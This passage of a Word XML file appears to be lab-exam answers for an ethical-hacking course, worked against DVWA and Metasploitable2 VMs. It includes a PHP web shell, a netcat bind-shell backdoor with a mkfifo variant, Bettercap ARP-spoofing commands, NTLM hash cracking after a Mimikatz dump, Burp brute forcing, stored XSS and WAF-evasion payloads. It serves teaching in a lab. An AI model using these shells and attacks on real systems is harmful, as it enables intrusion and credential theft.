        <w:t xml:space="preserve">Trigger the modified cron/script and confirm elevated access (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">(Marginal note "brute force" suggests an alternate pairing with Hydra-style credential brute forcing as the second exercise.)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13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Exploit File Upload Vulnerability in DVWA to upload a malicious file (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set security to Low, open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">File Upload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Create a simple PHP web shell, e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="bongo_lang_php_1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t xml:space="preserve">&lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upload it (at Low level there is no extension/type filtering).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browse to the uploaded file's path with a command parameter, e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.../hackable/uploads/shell.php?cmd=id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, to execute OS commands through the web shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Capture network traffic between Kali Linux and Windows using Wireshark (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start a Wireshark capture on the interface connecting both VMs (or on a bridging host).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate traffic between them (ping, RDP, SMB access).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Filter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip.addr == &lt;windows-ip&gt;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t xml:space="preserve">Inspect protocol handshakes/payloads in the packet list and stream view.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14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Use nslookup to extract DNS records of a target domain (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nslookup -type=any example.com</w:t>
        <w:br/>
        <w:t xml:space="preserve">nslookup -type=mx example.com</w:t>
        <w:br/>
        <w:t xml:space="preserve">nslookup -type=ns example.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Extract A records (IP), MX records (mail servers), NS records (name servers), and any TXT records (often SPF/DKIM).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Perform OS fingerprinting and service version detection (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nmap -sV -O 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">(as noted on the slip) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> probes open ports to determine service/version banners; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> analyses TCP/IP stack behaviour to guess the target OS and kernel version.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15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Crack Windows password hashes using Hashcat (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obtain the NTLM hash (e.g., via Mimikatz or a SAM dump) and save it (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hash.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run Hashcat in NTLM mode:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">View results:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hashcat -m 1000 hash.txt --show</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Use Burp Suite Intruder on DVWA's login page to brute-force credentials (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure the browser to proxy through Burp (127.0.0.1:8080) and install Burp's CA cert if testing HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capture the DVWA login POST request, send it to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Intruder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t xml:space="preserve">Mark the username and/or password field as the payload position (Sniper, or Cluster Bomb for both).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Load a wordlist for the payload set and start the attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compare response length/status code — the successful login typically differs (redirect vs. "login failed" message).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16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Install and launch Metasploit Framework, confirming it works properly (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt install metasploit-framework   # pre-installed on Kali</w:t>
        <w:br/>
        <w:t xml:space="preserve">sudo msfdb init</w:t>
        <w:br/>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Inside the console, run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">banner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">help</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to confirm it launched correctly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Perform passive reconnaissance using Shodan (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a free account at shodan.io.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Search, e.g.: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">apache country:"IN"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or a specific IP/domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extract banners, open ports, geolocation, and vulnerabilities — all gathered without ever touching the target directly (purely passive, using data Shodan has already indexed).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18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Identify and demonstrate OWASP Top 10 vulnerabilities in DVWA (15M)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Briefly demonstrate one example each (security = Low):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Injection:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL Injection module (see Slip 3).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Broken Authentication:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Brute Force module with Hydra/Burp Intruder (see Slip 10/15).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Sensitive Data Exposure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inspect traffic in Wireshark during login (see Slip 7/13).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XXE / Security Misconfiguration:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> File Inclusion module.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Broken Access Control:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Insecure CAPTCHA / IDOR-style parameter tampering.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XSS:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Reflected and Stored modules (see Slip 5/20).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CSRF:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Password-change module (see Slip 10).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Using Components with Known Vulnerabilities:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> outdated PHP/MySQL stack DVWA runs on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Install DVWA on a virtual machine and test access from Kali Linux (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Install a LAMP/XAMPP stack on the target VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Download DVWA source, place it in the web root, configure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">config/config.inc.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with DB credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dvwa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> database; browse to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">setup.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Create/Reset Database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t xml:space="preserve">From Kali's browser, navigate to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;dvwa-vm-ip&gt;/login.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and log in (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"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19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Use Censys to identify open ports and services of a target system (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to censys.io and search </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip:&lt;target-ip&gt;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t xml:space="preserve">Review the host report: open ports, service banners, TLS certificate details, and associated autonomous system info — again, gathered passively from Censys' own internet-wide scan data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Demonstrate a Man-in-the-Middle (MITM) attack using Bettercap (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo bettercap -iface eth0</w:t>
        <w:br/>
        <w:t xml:space="preserve">net.probe on</w:t>
        <w:br/>
        <w:t xml:space="preserve">net.recon on</w:t>
        <w:br/>
        <w:t xml:space="preserve">set arp.spoof.targets &lt;target-ip&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">arp.spoof on</w:t>
        <w:br/>
        <w:t xml:space="preserve">net.sniff on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">This poisons the target's ARP cache so its traffic routes through the attacker machine, where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">net.sniff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> logs the intercepted packets.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20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Scan a web application for vulnerabilities using Nikto (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nikto -h http://&lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Review findings: outdated server software/banners, missing security headers, default/backup files, and known vulnerable scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Exploit Stored XSS in DVWA and demonstrate a persistent payload (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set security to Low, open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">XSS (Stored)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (guestbook form).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Submit a message containing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt;alert('Stored XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unlike reflected XSS, this payload is saved to the database and executes automatically for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">every</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> visitor who later views the guestbook — demonstrating persistence.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22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Generate a network topology map using Nmap scripting (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nmap -sn 192.168.1.0/24 --traceroute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">For a graphical topology, use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Zenmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Nmap's GUI): run the same scan and open the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Topology</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tab, which renders hosts/hops as a visual graph.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Create a Netcat backdoor and connect to it from Kali Linux (15M)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> On the target (lab VM):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nc -lvp 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">From Kali:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nc &lt;target-ip&gt; 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">(If the installed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lacks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, use a named-pipe variant: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mkfifo /tmp/f; nc -lvp 4444 &lt; /tmp/f | /bin/bash &gt; /tmp/f 2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.) A successful connection hands the Kali side an interactive shell on the target.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23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Attempt to bypass DVWA's security filters/WAF using tampered requests in Burp Suite (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capture a request that gets blocked by the filter (e.g., an SQLi/XSS payload at Medium/High security).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, try evasion techniques: case variation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SeLeCt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), inline comments (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNI/**/ON SEL/**/ECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), URL/hex encoding, or alternate tag syntax for XSS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;ScRiPt&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, event handlers like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onerror=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resend and observe whether the filter is bypassed and the payload executes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Use Nmap to discover live hosts in your lab setup (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nmap -sn 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">A ping-sweep (no port scan) that lists which hosts on the subnet respond — useful for building an inventory of live machines before deeper scanning.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24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Perform DNS enumeration using the dig command (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dig example.com ANY</w:t>
        <w:br/>
        <w:t xml:space="preserve">dig example.com MX</w:t>
        <w:br/>
        <w:t xml:space="preserve">dig example.com NS</w:t>
        <w:br/>
        <w:t xml:space="preserve">dig -x &lt;ip-address&gt;      # reverse lookup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Extract A, MX, NS, and PTR records from the responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Identify open ports and services on Metasploitable2 using Nmap (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nmap -sV -p- &lt;metasploitable2-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Expect common intentionally-open services: FTP (21), SSH (22), Telnet (23), SMTP (25), DNS (53), HTTP (80), RPC (111), NetBIOS/SMB (139/445), MySQL (3306), and more — each a known vulnerable version by design.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Slip 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Perform vulnerability scanning using OpenVAS and generate a report (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set up GVM/OpenVAS: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo gvm-setup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo gvm-start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Browse to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://localhost:9392</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and log in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
